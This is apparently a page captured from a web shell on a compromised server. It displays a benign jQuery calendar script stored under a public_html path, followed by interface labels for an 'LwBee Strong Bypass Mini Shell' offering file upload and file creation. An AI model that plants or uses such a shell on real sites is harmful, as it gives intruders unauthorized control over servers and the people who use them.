/home/aloic1/public_html/assets/dashboard/js/scripts/plugins/calendar.js
(function ($) {
  "use strict";
  
    $(document).on('click', '#dayview', function() {
      $('.fullcalendar').fullCalendar('changeView', 'agendaDay')
    });

    $(document).on('click', '#weekview', function() {
      $('.fullcalendar').fullCalendar('changeView', 'agendaWeek')
    });

    $(document).on('click', '#monthview', function() {
      $('.fullcalendar').fullCalendar('changeView', 'month')
    });

    $(document).on('click', '#todayview', function() {
      $('.fullcalendar').fullCalendar('today')
    });

})(jQuery);
@LwBee Strong Bypass

LwBee Strong Bypass Mini Shell

Upload File

Create New File